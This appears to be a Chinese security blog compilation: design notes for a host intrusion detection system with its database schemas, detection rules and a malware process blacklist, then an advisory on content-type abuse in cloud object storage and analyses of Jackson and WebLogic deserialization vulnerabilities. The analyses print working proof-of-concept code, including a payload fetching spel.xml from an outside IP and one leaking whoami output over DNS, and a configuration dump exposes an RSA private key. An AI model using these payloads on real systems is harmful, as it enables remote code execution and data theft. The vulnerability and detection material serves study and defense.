通过pcap(gopcap)进行对网络链接进行实时抓包。

Windows：装WinPcap

Linux：装libpcap

三、文件操作实时监控

通过inotify（fsnotify）监控磁盘文件变化。

四、ES索引类型字段

索引：monitor2018_04

类型：connection、file、loginlog、process

字段：data.action、data.command、data.dir、data.hash、data.hostname、data.info、data.local、data.name、data.parentname、data.path、data.pid、data.ppid、data.protocol、data.remote、data.status、data.user、data.username、ip、time

举例：

_index	_type	_id	_score	ip	data.remote	data.status	data.username	time	data.dir	data.local	data.name	data.pid	data.protocol	data.action	data.hash	data.path	data.user	data.parentname	data.ppid
monitor2018_04	loginlog	AWKodaW5ZT0_Kn0N9YOy	1	192.168.1.1	0	true	Administrator	2018-02-17T18:37:44+07:00
monitor2018_04	connection	AWKpDlutZT0_Kn0N9Ydd	1	192.168.1.1	182.118.40.31			2018-04-09T14:18:06+08:00	out	192.168.1.1:54080	LiveUpdate360.exe	3524	tcp
monitor2018_04	file	AWKo3gdkZT0_Kn0N9Ycu	1	192.168.1.1				2018-04-09T13:25:21+08:00						WRITE	899a5bf1669610cdb78d322ac8d9358b	c:\windows\sysnative\Packet.dll	Administrators
monitor2018_04	process	AWKzeH6oZT0_Kn0N9Y0x	1	192.168.1.1				2018-04-11T14:49:43+08:00			cmd.exe	2380						sqlservr.exe	1392

五、MongoDB数据库

>show collections
client
config
file
info
notice
rules
server
statistics

字段数据举例：

client：

db.client.find()

 "_id" : ObjectId("5acf4cde5e2ba50ef19a6347"), "ip" : "192.168.1.2", "hostname" : "bbbbbbbbbbbbbbb", "path" : [ ], "system" : "Windows Server 2008 R2 Enterprise  64", "type" : "db", "uptime" : ISODate("2018-04-12T12:15:10.475Z"), "health" : 1 }

{ "_id" : ObjectId("5acf4dec5e2ba50ef1b547f9"), "ip" : "192.168.1.3", "hostname" : "bbbbbbbbbbbbbbb", "path" : [ ], "system" : "Windows Server 2008 R2 Enterprise  64", "type" : "db", "uptime" : ISODate("2018-04-13T10:29:36.636Z"), "health" : 2 }

0健康 1离线 2存在防火墙阻拦

config：

db.config.find()

{ "_id" : ObjectId("5ac9e1a25e2ba50ef1a758e2"), "type" : "client", "dic" : { "cycle" : 2, "udp" : false, "lan" : false, "monitorPath" : [ "%windows%", "%system32%", "%web%", "/etc/", "/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/" ] } }
{ "_id" : ObjectId("5ac9e1a25e2ba50ef1a758e3"), "type" : "server", "dic" : { "publickey" : "-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDJcyrbTRmezc++tR1ZF4R0LktE\nNye/MHY07CE229av69YnJuUtYnEWc1471mDhaJmL8kAb+46Bt7y7L53H2t4VuMTd\nQfghZ/QAyKWsumupZhll0clh3bbROKHfJbNYSydmT+M9GbLygGeH1zLpSL8Qx9to\n4eVPhcIUMhjGGxbpqwIDAQAB\n-----END PUBLIC KEY-----\n", "privatekey" : "-----BEGIN RSA PRIVATE KEY-----\nMIICXgIBAAKBgQDJcyrbTRmezc++tR1ZF4R0LktENye/MHY07CE229av69YnJuUt\nYnEWc1471mDhaJmL8kAb+46Bt7y7L53H2t4VuMTdQfghZ/QAyKWsumupZhll0clh\n3bbROKHfJbNYSydmT+M9GbLygGeH1zLpSL8Qx9to4eVPhcIUMhjGGxbpqwIDAQAB\nAoGBAImFMFWDHaFWOKKku0MtlcNGMyV/TYfsClX4eHgdvUJdCdWybLL9x9ueqE7K\n+1oFcQSjPHad1Nvi1VknmVtsozwTAMWoRq1J1NLVK4nxKpB4G1WRw7lQPLTLwmkZ\n3MuvNHQpFKtUGgAnv8bOer2ijDpkg72FCU140ETapTGHVmfBAkEA/TMb8vgwhYK8\nnu/telcL8BStGbp+pS0T84Zcg4kdlznsQHXPnpueSQvsJmXeSW9zaDf/cQUMJFvT\nHzfbNgLSIQJBAMutiak/F6A1caFuS3uiDLwBnFBjvWR16YKonhSomSbE2RP4xPMm\nXXhjv1xPtLfav1Rx95txjiZyREjJNzlsGksCQQDZOhoGcAwg3zM4IJvbVAb36KVB\n55Bz4aK2UVXZu69ZaOZZvzlq2BQKk2H853S4CBg5F6Hdsvjh0K3moKM/SVhBAkBo\nOjDk9A1iBZdVdbyY0s9TcjuMg83KV/Cb1S+4AKMGzNsNNlOK3goc7mZhlcQ0BXO9\ngeikmhKVKAo7eQSSlPhLAkEApEHlFSWjbedA9RgHuUa/BeX6htRoghfOfS34Ebqg\ntuxp35YdsLs6iDl7zf1ZQuUvUsTPhXnSzP2Yti0/dI7Ejg==\n-----END RSA PRIVATE KEY-----\n", "cert" : "-----BEGIN CERTIFICATE-----\nMIICEDCCAXmgAwIBAgIJANcVcODaSbzPMA0GCSqGSIb3DQEBBQUAMCExHzAdBgNV\nBAMMFmRvbWFpbi1zZWMtcHJvamVjdC5jb20wHhcNMTgwNDA4MDkzNjM3WhcNMjgw\nNDA1MDkzNjM3WjAhMR8wHQYDVQQDDBZkb21haW4tc2VjLXByb2plY3QuY29tMIGf\nMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDJcyrbTRmezc++tR1ZF4R0LktENye/\nMHY07CE229av69YnJuUtYnEWc1471mDhaJmL8kAb+46Bt7y7L53H2t4VuMTdQfgh\nZ/QAyKWsumupZhll0clh3bbROKHfJbNYSydmT+M9GbLygGeH1zLpSL8Qx9to4eVP\nhcIUMhjGGxbpqwIDAQABo1AwTjAdBgNVHQ4EFgQUZwP3xxBKYkhKUFyxt4ZoktDU\ne0YwHwYDVR0jBBgwFoAUZwP3xxBKYkhKUFyxt4ZoktDUe0YwDAYDVR0TBAUwAwEB\n/zANBgkqhkiG9w0BAQUFAAOBgQATrutSnvbPTqrPv+19DQZSSSTWQoyaddPT3Q5i\nvyqerVrozRfgHbxKspZZIyJL04BQtCLj+85yIIRfgTbWozy5pwimjJYd8NB72PUr\n8mirgWqewMLe1mhWmS8IXOJfzFhB9azlj5sly47JunLnbKlaVqU+ZtjUiq7jKw4p\nlpBftw==\n-----END CERTIFICATE-----\n", "learn" : false, "offlinecheck" : false } }
{ "_id" : ObjectId("5ac9e1a25e2ba50ef1a758e4"), "type" : "intelligence", "dic" : { "switch" : false, "ipapi" : "http://127.0.0.1/api/?ip={$ip}", "fileapi" : "http://127.0.0.1/api/?hash={$hash}", "regex" : "black" } }
{ "_id" : ObjectId("5ac9e1a25e2ba50ef1a758e5"), "dic" : { "switch" : false, "onlyhigh" : false, "api": "http://127.0.0.1/test/?text={$info}" }, "type" : "notice" }
{ "_id" : ObjectId("5ac9e1a25e2ba50ef1a758e6"), "dic" : { "file" : [ ], "ip" : [ ], "process" : [ ], "other" : [ ] }, "type" : "whitelist" }
{ "_id" : ObjectId("5ac9e1a25e2ba50ef1a758e7"), "type" : "blacklist", "dic" : { "process" : [ "mssecsvc\\.exe", "tasksche\\.exe" ], "other" : [ ], "file" : [ ], "ip" : [ ] } }
{ "_id" : ObjectId("5ac9e1a25e2ba50ef1a758e8"), "type" : "filter", "dic" : { "file" : [ "^c:\\\\windows\\\\temp$", "\\.(png|js|css|jpg|gif|wolff|svg)$" ], "ip" : [ ], "process" : [ "c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe" ] } }
{ "_id" : ObjectId("5ac9e1a25e2ba50ef1a758e9"), "type" : "web", "dic" : { "tfakey" : "" } }

file:

> db.file.find()
{ "_id" : ObjectId("5ac9e22c5e2ba50ef1a7591f"), "platform" : "64", "system" : "linux", "type" : "agent", "hash" : "08e2a1144e4191e375cb03fcd5e7a7c3", "uptime" : ISODate("2018-04-08T09:34:36.178Z") }
{ "_id" : ObjectId("5ac9e22c5e2ba50ef1a75922"), "platform" : "64", "system" : "linux", "type" : "daemon", "hash" : "5b1ddf0f8ee2fc9c170be29462cdcc54", "uptime" : ISODate("2018-04-08T09:34:36.218Z") }
{ "_id" : ObjectId("5ac9e22c5e2ba50ef1a75925"), "platform" : "64", "system" : "linux", "type" : "data", "hash" : "ec777b4a79f32254f5a8dae10cf029b2", "uptime" : ISODate("2018-04-08T09:34:36.222Z") }
{ "_id" : ObjectId("5ac9e2305e2ba50ef1a7592c"), "platform" : "32", "system" : "windows", "type" : "agent", "hash" : "536f05fd939ae563fbdd7e52a3d7e132", "uptime" : ISODate("2018-04-08T09:34:40.776Z") }
{ "_id" : ObjectId("5ac9e2305e2ba50ef1a7592f"), "platform" : "32", "system" : "windows", "type" : "daemon", "hash" : "37e3593a084dff5e2bce85dd4815cf8e", "uptime" : ISODate("2018-04-08T09:34:40.792Z") }
{ "_id" : ObjectId("5ac9e2305e2ba50ef1a75932"), "platform" : "32", "system" : "windows", "type" : "data", "hash" : "ce04138b9f0336f5c30297d34b44b63a", "uptime" : ISODate("2018-04-08T09:34:40.793Z") }
{ "_id" : ObjectId("5ac9e2305e2ba50ef1a75938"), "platform" : "64", "system" : "windows", "type" : "agent", "hash" : "536f05fd939ae563fbdd7e52a3d7e132", "uptime" : ISODate("2018-04-08T09:34:40.935Z") }
{ "_id" : ObjectId("5ac9e2305e2ba50ef1a7593b"), "platform" : "64", "system" : "windows", "type" : "daemon", "hash" : "37e3593a084dff5e2bce85dd4815cf8e", "uptime" : ISODate("2018-04-08T09:34:40.951Z") }
{ "_id" : ObjectId("5ac9e2305e2ba50ef1a7593e"), "platform" : "64", "system" : "windows", "type" : "data", "hash" : "00af5f5a51df34a942d44cf9641ad368", "uptime" : ISODate("2018-04-08T09:34:40.953Z") }

info:

> db.info.findOne()
{
"_id" : ObjectId("5aca09915e2ba50ef1ac00a7"),
"ip" : "192.168.1.4",
"type" : "userlist",
"system" : "linux",
"data" : [
{
"name" : "root",
"description" : "x:0:0:root:/root:/bin/bash"
},
{
"description" : "x:5:0:sync:/sbin:/bin/sync",
"name" : "sync"
},
{
"name" : "shutdown",
"description" : "x:6:0:shutdown:/sbin:/sbin/shutdown"
},
{
"description" : "x:7:0:halt:/sbin:/sbin/halt",
"name" : "halt"
},
{
"description" : "x:500:500::/home/niubi:/bin/bash",
"name" : "niubi"
},
{
"name" : "papapa",
"description" : "x:550:550::/home/papapa:/bin/bash"
}
],
"uptime" : ISODate("2018-04-09T09:05:48.640Z")
}
>

notice：

> db.notice.findOne()
{
"_id" : ObjectId("5aca09915e2ba50ef1ac00ee"),
"description" : "企业网络中首次出现的linux可登陆用户",
"info" : "root|x:0:0:root:/root:/bin/bash",
"ip" : "192.168.1.4",
"level" : 1,
"source" : "可疑用户",
"status" : 4,
"time" : ISODate("2018-04-08T12:22:41.864Z"),
"type" : "userlist"
}

rules：

{
"_id" : ObjectId("5ac9e1de5e2ba50ef1a758f8"),
"enabled" : true,
"meta" : {
"description" : "web进程执行了系统命令，可能为命令执行漏洞或者webshell行为",
"level" : 0,
"name" : "WebServer可疑进程启动(windows)",
"author" : "wolf"
},
"rules" : {
"name" : {
"data" : "^(cmd\\.exe|powershell\\.exe)$",
"type" : "regex"
},
"parentname" : {
"data" : "^(w3wp\\.exe|httpd\\.exe|nginx\\.exe|php-cgi\\.exe)$",
"type" : "regex"
}
},
"source" : "process",
"system" : "windows",
"and" : true
}

server：

{
"_id" : ObjectId("5aca096d5e2ba50ef1a75c5c"),
"netloc" : "192.168.1.5:33433",
"uptime" : ISODate("2018-04-13T12:47:34.678Z")
}

statistics:

{ "_id" : ObjectId("5aca09915e2ba50ef1ac00ab"), "uptime" : ISODate("2018-04-11T12:35:13.782Z"), "type" : "loginlog", "info" : "192.168.1.6", "count" : 30, "server_list" : [ "192.168.1.4", "192.168.1.5" ]}

{ "_id" : ObjectId("5aca09915e2ba50ef1ac00b8"), "type" : "loginlog", "info" : "192.168.1.7", "count" :12, "server_list" : [ "192.168.1.4", "192.168.1.5" ], "uptime" : ISODate("2018-04-09T09:05:48.640Z")}


{ "_id" : ObjectId("5aca09915e2ba50ef1ac00b4"), "type" : "userlist", "info" : "root", "count" : 4, "server_list" : [ "192.168.1.4", "192.168.1.5" ], "uptime" : ISODate("2018-04-09T09:05:48.640Z") }

{ "_id" : ObjectId("5acf1f5e5e2ba50ef1fb4e28"), "type" : "userlist", "info" : "piasdf$", "count" : 7,"server_list" : [ "192.168.1.1", "192.168.1.2", "192.168.1.3" ], "uptime" : ISODate("2018-04-12T12:35:53.264Z") }


{ "_id" : ObjectId("5aca09915e2ba50ef1ac00b6"), "info" : "0.0.0.0:5266", "count" : 7, "server_list" :[ "192.168.1.4", "192.168.1.5" ], "uptime" : ISODate("2018-04-12T18:21:44.314Z"), "type" : "listening" }

{ "_id" : ObjectId("5aca0bc25e2ba50ef1e3542a"), "type" : "listening", "info" : "0.0.0.0:443", "count": 4, "server_list" : [ "192.168.1.5" ], "uptime" : ISODate("2018-04-12T18:21:44.314Z") }



{ "_id" : ObjectId("5aca0bc25e2ba50ef1e353e0"), "type" : "crontab", "info" : "/usr/bin/test -f  /tmp/lockfile >/dev/null || /opt/apple/apps/ddd/tool 2 >/dev/null && /bin/touch /tmp/lock", "count" : 1, "server_list" : [ "192.168.1.5" ], "uptime" : ISODate("2018-04-08T12:32:02.633Z") }

{ "_id" : ObjectId("5acadea05e2ba50ef1a55877"), "type" : "crontab", "info" : "c:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe", "count" : 16, "server_list" : [ "192.168.1.1", "192.168.1.2", "192.168.1.3" ], "uptime" : ISODate("2018-04-12T12:35:53.233Z") }



{ "_id" : ObjectId("5acadea95e2ba50ef1a630c8"), "type" : "connection", "info" : "111.206.79.165", "count" : 4987, "server_list" : [ "192.168.1.1" ], "uptime" : ISODate("2018-04-11T12:53:15.086Z") }

{ "_id" : ObjectId("5acae3135e2ba50ef11946e6"), "type" : "connection", "info" : "123.125.80.36", "count" : 1, "server_list" : [ "192.168.1.1" ], "uptime" : ISODate("2018-04-09T03:50:43.619Z") }



{ "_id" : ObjectId("5acf23575e2ba50ef16296eb"), "type" : "process", "info" : "w3wp.exe", "count" : 6,"server_list" : [ "192.168.1.1", "192.168.1.2", "192.168.1.3" ], "uptime" : ISODate("2018-04-13T12:43:03.017Z") }
{ "_id" : ObjectId("5acf32385e2ba50ef1e5ee42"), "info" : "HipsMain.exe", "count" : 3, "server_list" :[ "192.168.1.1", "192.168.1.3" ], "uptime" : ISODate("2018-04-12T12:39:49.601Z"), "type" : "process" }



{ "_id" : ObjectId("5acadea05e2ba50ef1a5587a"), "uptime" : ISODate("2018-04-12T12:35:53.232Z"), "type" : "startup", "info" : "360sd", "count" : 18, "server_list" : [ "192.168.1.1", "192.168.1.2", "192.168.1.3" ] }

{ "_id" : ObjectId("5acadea05e2ba50ef1a55886"), "count" : 18, "server_list" : [ "192.168.1.1", "192.168.1.2", "192.168.1.3" ], "uptime" : ISODate("2018-04-12T12:35:53.232Z"), "type" : "startup", "info" : "AnyDesk" }



{ "_id" : ObjectId("5acae2665e2ba50ef107caa7"), "type" : "service", "info" : "hidserv", "count" : 114, "server_list" : [ "192.168.1.1", "192.168.1.2", "192.168.1.3" ], "uptime" : ISODate("2018-04-13T11:41:20.587Z") }

{ "_id" : ObjectId("5acae2665e2ba50ef107cbe7"), "type" : "service", "info" : "SQLBrowser", "count" : 114, "server_list" : [ "192.168.1.1", "192.168.1.2", "192.168.1.3" ], "uptime" : ISODate("2018-04-13T11:41:20.587Z") }

六、入侵检测功能点和维度

[server]->ScanMonitorThread(安全检测线程)->Run(开始检测)->BlackFilter(黑名单)->WhiteFilter(白名单)->Rules(规则引擎)->Intelligence(威胁情报)

1. webshell写入行为

Linux目前支持Apache和nginx的目录自动监控：

apachectl -V

nginx -V

Windows目前支持IIS6和IIS7：

先在初始化时获取进程列表存库，如果获取到web进程，并web标签入库，则收集web目录，并进行监控：

x32
iis6配置文件:%SystemDrive%\WINDOWS\SysNative\inetsrv\MetaBase.xml
iis7配置文件:%SystemDrive%\Windows\SysNative\inetsrv\config\applicationHost.config

x64
iis6配置文件:%SystemDrive%\WINDOWS\System32\inetsrv\MetaBase.xml
iis7配置文件:%SystemDrive%\Windows\System32\inetsrv\config\applicationHost.config

识别模式：

1）文件监控，通过监控文件WRITE行为，正则匹配文件的后缀类型为黑名单中的后缀进行匹配。bypass 中文.aspx
2）进程监控，父进程是web服务，执行子进程是黑名单进程中的进程名字或命令。

2.异常登录、网络连接行为

统计第n次出现的登录ip、登录用户名告警，原则上MongoDB的statistics表里loginlog（登录的ip）、userlist（登录的用户）、listening（ip监听端口）、crontab（计划任务）、process（进程名字）、startup（启动项名字）、service（服务名字）都存在count字段，都可以通过自定义规则进行告警。

识别模式：

1）进程监控

2）文件监控，登录日志windows《驭龙 EventLog 读取模块的迭代历程》，Linux 登录成功（解析/var/log/wtmp）、登录失败lastb命令；

3）网络流量

3.异常命令调用行为

《Linux System Calls Hooking Method Summary》、《如何在Linux下监控命令执行》、《「驭龙」Linux执行命令监控驱动实现解析》

在驭龙hids官方git上的演示sql注入和命令执行，实际上跟我们平时理解的waf有所区别，没有对web请求进行监控。而是通过规则定义了sqlsrver.exe启动子进程为cmd.exe的调用关系，而在sqlserver上通过xp_cmdshell执行命令就是通过cmd间接执行其他命令的。

在3gstudent和evi1cg.me的博客上有关于win下文件下载、命令执行和sqlserver执行命令的一些姿势，如果理清楚进程的调用关系，相信你一定可以绕过某些安全软件的动作拦截，包括msf的payload去开shell等。

识别模式：

1）进程监控，通过规则定义进程调用关系进行告警

小结

没有小结~

OSS对象存储上传解析漏洞预警

2018-02-27T15:30:26.000Z

事件背景

安全研究员在近期发现网络上频繁发生国内大型互联网厂商上传图片后解析成html、js页面，被黑产人员用作钓鱼攻击。

攻击案例

酷狗钓鱼链接：
http://userphoto.bssdl.kugou.com/70296bbe6e02223af1cfb952b2eefcb3.jpg#1519721124069

实际上攻击者上传了一个内容为的后缀为jpg的文件，当用户打开原本是图片的网址，会被浏览器渲染成js最终的展示效果，包括一些列的鼠标事件和跳转。

漏洞分析

网易对象存储中提到“文件的 MIME，定义文件的类型及网页编码，决定浏览器将以什么形式、什么编码读取文件。如果用户没有指定则根据 Key 或文件名的扩展名生成，如果没有扩展名则填默认值”

以163站点为例http://new.hi.163.com/#/setting/step1 ，163新闻讨论站点上传头像地址。

攻击步骤：

0x01:

无论我们上传什么类型后缀的文件，只要截获上传数据包，将content-type类型修改为“text/html”：

0x02:

打开上传后的文件地址：http://hi-163-common.nosdn.127.net/upload/201802/27/6efee9301baa11e89a72a5fc87cb5892

发现content-type为我们上传时设置的text/html，发现原本的图片，已经把内容当做html进行渲染。

攻击者可通过自定义上传content-type类型，进行xss或者钓鱼攻击。

修复方案

业务研发方：在使用对象存储时，根据业务需要在服务端先校验文件后缀类型，再校验Content-Type是否属与此后缀类型相匹配；
云储存方：文件后缀类型与文件MIME强关联，一一对应，例如禁止jpeg后缀的文件MIME变成text/html。

写在最后

在几个月前我就在博客中有写到一篇《阿里云OSS约等于文件上传漏洞？》的文章，其中就提到了任意文件上传导致xss漏洞，当时只是发现了现象，并没有对oss云存储的形成漏洞的原因进一步测试总结。
现在来看除了用户使用上要严格校验上传文件类型外，OSS文件存储是否也应该在设计上避免“因用户默认不在后端校验文件MIME类型”导致的安全隐患呢？

Jackson反序列化远程代码执行漏洞

2018-01-12T15:57:20.000Z

Jackson漏洞历史(CVE-2017-7525)

北京时间2017年4月15日，Jackson框架被发现存在一个反序列化代码执行漏洞。该漏洞存在于Jackson框架下的enableDefaultTyping方法，通过该漏洞，攻击者可以远程在服务器主机上越权执行任意代码，从而取得该网站服务器的控制权。

Jackson是一个开源的Java序列化与反序列化工具，可以将java对象序列化为xml或json格式的字符串，或者反序列化回对应的对象，由于其使用简单，速度较快，且不依靠除JDK外的其他库，被众多用户所使用。

关于历史漏洞的分析可以参考，绿盟科技在17年发表的技术分析文章：http://blog.nsfocus.net/jackson-framework-java-vulnerability-analysis/

漏洞触发链

getOutputProperties()->newTransFormer()→newInstance()

构造方式

通过java生态中的第三方库存在的序列化方法构造序列化恶意攻击代码，并将恶意代码base64编码后拼接到一个精心构造的json数据包中，代码层如果在使用ObjectMapper对象实例时
（ObjectMapper mapper = new ObjectMapper();）开启了enableDefaultType特性（例如mapper.enableDefaultTyping();），会在readValue时对传入的JSON自动调用第三方库的反序列化方法，造成代码执行。

官方修复方式

官方在漏洞产生后，通过黑名单的方式禁止黑名单中的第三方库因为反序列化问题而产生的代码执行漏洞。

黑名单如下：

org.apache.commons.collections.functors.InvokerTransformer
org.apache.commons.collections.functors.InstantiateTransformer
org.apache.commons.collections4.functors.InvokerTransformer
org.apache.commons.collections4.functors.InstantiateTransformer
org.codehaus.groovy.runtime.ConvertedClosure
org.codehaus.groovy.runtime.MethodClosure
org.springframework.beans.factory.ObjectFactory
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl

新漏洞的产生(CVE-2017-17485)

众所周知黑名单是一种不可靠的修复方式，攻击者常常可以通过一些手段绕过黑名单，造成漏洞影响。

安全研究人员发现，在开启enableDefaultTyping()的前提下可以通过Jackson-databind来滥用Spring spel来执行任意命令。

POC

关于Jackson-databind漏洞所有的poc验证代码：https://github.com/shengqi158/Jackson-databind-RCE-PoC Code by 廖新喜

其中CVE-2017-17485的验证代码：

package jackson;
 
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
import java.lang.reflect.Array;
 
/**
 * Created by liaoxinxi on 2017-12-11.
 */
 
public class TestJdbcRowSetImplPoc {
    public static void main(String args[]){
        testSpringFramework();
    }
 
    public static void testSpringFramework(){
        //CVE-2017-17485
        // 假设这是攻击者可以控制的请求包payload
        String payload = "[\"org.springframework.context.support.ClassPathXmlApplicationContext\", " +
                "\"http://188.51.32.233/spel.xml\"]\n";
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();
        try {
            mapper.readValue(payload, Object.class);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

spel.xml文件内容：


  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="
     http://www.springframework.org/schema/beans
     http://www.springframework.org/schema/beans/spring-beans.xsd
">

造成代码执行：

官方已经更新黑名单列表，并计划在Jackson的大版本3.X通过api层实现基于白名单的序列化方式来应对多态类：

org.apache.commons.collections.functors.InvokerTransformer
org.apache.commons.collections.functors.InstantiateTransformer
org.apache.commons.collections4.functors.InvokerTransformer
org.apache.commons.collections4.functors.InstantiateTransformer
org.codehaus.groovy.runtime.ConvertedClosure
org.codehaus.groovy.runtime.MethodClosure
org.springframework.beans.factory.ObjectFactory
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
org.apache.xalan.xsltc.trax.TemplatesImpl
com.sun.rowset.JdbcRowSetImpl
java.util.logging.FileHandler
java.rmi.server.UnicastRemoteObject
org.springframework.aop.support.AbstractBeanFactoryPointcutAdvisor
org.springframework.beans.factory.config.PropertyPathFactoryBean
com.mchange.v2.c3p0.JndiRefForwardingDataSource
com.mchange.v2.c3p0.WrapperConnectionPoolDataSource

修复建议

升级到最新版本jackson-databind 2.7.9.2，2.8.11，2.9.3.1（2018-01-13 00:04:20该版本还未发布）
禁用enableDefaultTyping()方法；
对客户端传入的JSON数据，进行过滤或者类型检查。

参考链接

http://blog.nsfocus.net/jackson-framework-java-vulnerability-analysis/
https://github.com/shengqi158/Jackson-databind-RCE-PoC
https://mp.weixin.qq.com/s/FOOC9EmNqGE9YB5OAu4mEA
https://github.com/FasterXML/jackson-databind/releases
https://www.securityfocus.com/archive/1/archive/1/541652/100/0/threaded
https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
https://www.secfree.com/article-676.html

weblogic XMLDecoder反序列化漏洞-CVE-2017-10271

2017-12-29T09:43:22.000Z

XMLDecoder反序列化漏洞

老外的详细利用文章：http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
国内的demo:http://blog.51cto.com/duallay/1961598

poc xml文件：



    
        
            
                /Applications/Calculator.app/Contents/MacOS/Calculator

读取xml文件，进行反序列化执行命令代码：

import java.io.BufferedInputStream;
import java.io.FileInputStream;
import java.io.FileNotFoundException;

public class xmlrce {

    public static void main(String[] args) {
        // TODO Auto-generated method stub
        java.io.File file = new java.io.File("/Users/pirogue/IdeaProjects/weblogic/src/poc.xml");

        java.beans.XMLDecoder xd = null;
        try {
            xd = new java.beans.XMLDecoder(new BufferedInputStream(new FileInputStream(file)));
        } catch (FileNotFoundException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }

        Object s2 = xd.readObject();
        xd.close();
    }

}

CVE-2017-10271 weblogic反序列化漏洞

WLSServletAdapter.class

public void handle(ServletContext var1, HttpServletRequest var2, HttpServletResponse var3) throws IOException {
    if (var2.getMethod().equals("GET") || var2.getMethod().equals("HEAD")) {
        HttpMetadataPublisher var4 = (HttpMetadataPublisher)this.endpoint.getSPI(HttpMetadataPublisher.class);
        if (var4 != null && var4.handleMetadataRequest(this, this.createConnection(var1, var2, var3))) {
            return;
        }

        if (this.isOraWsdlMetadataQuery(var2.getQueryString())) {
            this.publishWSDL(this.createConnection(var1, var2, var3));
            return;
        }
    }

    super.handle(var1, var2, var3);
}

当开启调试模式，时，WLSServletAdapter对请求进行接收处理，执行到super.handle(var1, var2, var3);后，跟进关键代码如下：

WorkContentServerTube.class

public NextAction processRequest(Packet var1) {
    this.isUseOldFormat = false;
    if (var1.getMessage() != null) {
        HeaderList var2 = var1.getMessage().getHeaders();
        Header var3 = var2.get(WorkAreaConstants.WORK_AREA_HEADER, true);
        if (var3 != null) {
            this.readHeaderOld(var3);
            this.isUseOldFormat = true;
        }

        Header var4 = var2.get(this.JAX_WS_WORK_AREA_HEADER, true);
        if (var4 != null) {
            this.readHeader(var4);
        }
    }

    return super.processRequest(var1);
}

将var3传递给readHeaderOld(var3)，继续跟进readHeaderOld。
var1的值:

com.sun.xml.ws.api.message.Packet@4419bacb Content: '1.0' encoding='UTF-8'?>"http://schemas.xmlsoap.org/soap/envelope/">"http://bea.com/2004/06/soap/workarea/" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
 "1.8.0_131" class="java.beans.XMLDecoder">
 <void class="java.lang.ProcessBuilder">
 class="java.lang.String" length="3">
 <void index="0">
 /bin/bash
 
 <void index="1">
 -c
 
 <void index="2">
 ping `whoami`.7153b738c41fxxxxxxaadf9dbd46.tu4.org

WorkContextTube.class

protected void readHeaderOld(Header var1) {
    try {
        XMLStreamReader var2 = var1.readHeader();
        var2.nextTag();
        var2.nextTag();
        XMLStreamReaderToXMLStreamWriter var3 = new XMLStreamReaderToXMLStreamWriter();
        ByteArrayOutputStream var4 = new ByteArrayOutputStream();
        XMLStreamWriter var5 = XMLStreamWriterFactory.create(var4);
        var3.bridge(var2, var5);
        var5.close();
        WorkContextXmlInputAdapter var6 = new WorkContextXmlInputAdapter(new ByteArrayInputStream(var4.toByteArray()));
        this.receive(var6);
    } catch (XMLStreamException var7) {
        throw new WebServiceException(var7);
    } catch (IOException var8) {
        throw new WebServiceException(var8);
    }
}

基础知识拓展：
ByteArrayInputStream的用法：
1
2
3
4
5
InputStream
|__ ByteArrayInputStream

OutputStream
|__ ByteArrayOutputStream
ByteArrayInputStream可以将字节数组转化为输入流。ByteArrayOutputStream可以捕获内存缓冲区的数据，转化成字节数组。
构造函数：
1
2
3
public ByteArrayInputStream(byte buf[])

public ByteArrayInputStream(byte buf[], int offset, int length)
注意它需要提供一个byte数组作为缓冲区。

我们通过idea代码窗口内可以看到各个变量在调试运行后的值，var4的值就是接收poc的xml，在
WorkContextXmlInputAdapter var6 = new WorkContextXmlInputAdapter(new ByteArrayInputStream(var4.toByteArray()));
中，要创建WorkContextXmlInputAdapter的实例var6, 则var4.toByteArray()先转换成字节数组，传入ByteArrayInputStream转换成输入流，跟进WorkContextXmlInputAdapter，在WorkContextXmlInputAdapter.class内，WorkContextXmlInputAdapter接收输入流，并将输入流转换成XMLDecoder对象，这时如果再调用XMLDecoder的readObject()方法对其进行反序列化即可造成命令执行。其实在this.receive(var6);中，进行了多层调用最终到达readObject，下面会省略过多无关调试，记录xml反序列化相关：

下面是对WorkContextXmlInputAdapter和创建xml反序列化对象后如何执行的readObject方法造成rce的代码跟踪

WorkContextXmlInputAdapter.class

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//

package weblogic.wsee.workarea;

import java.beans.XMLDecoder;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.NotSerializableException;
import weblogic.workarea.WorkContext;
import weblogic.workarea.WorkContextInput;

public final class WorkContextXmlInputAdapter implements WorkContextInput {
    private final XMLDecoder xmlDecoder;

    public WorkContextXmlInputAdapter(InputStream var1) {
        this.xmlDecoder = new XMLDecoder(var1); // WorkContextXmlInputAdapter构造函数，将输入流转换成XMLDecoder反序列化对象
    }

    public WorkContextXmlInputAdapter(XMLDecoder var1) {
        this.xmlDecoder = var1;
    }

    public String readASCII() throws IOException {
        return (String)this.xmlDecoder.readObject();
    }

    public WorkContext readContext() throws IOException, ClassNotFoundException {
        Class var1 = Class.forName(this.readASCII());

        try {
            WorkContext var2 = (WorkContext)var1.newInstance();
            var2.readContext(this);
            return var2;
        } catch (InstantiationException var3) {
            throw (IOException)(new NotSerializableException("WorkContext must have a public no-arg constructor")).initCause(var3);
        } catch (IllegalAccessException var4) {
            throw (IOException)(new NotSerializableException("WorkContext must have a public no-arg constructor")).initCause(var4);
        }
    }

    public void readFully(byte[] var1) throws IOException {
        byte[] var2 = (byte[])((byte[])this.xmlDecoder.readObject());
        System.arraycopy(var2, 0, var1, 0, var2.length);
    }

    public void readFully(byte[] var1, int var2, int var3) throws IOException {
        byte[] var4 = (byte[])((byte[])this.xmlDecoder.readObject());
        System.arraycopy(var4, 0, var1, var2, var3);
    }

    public int skipBytes(int var1) throws IOException {
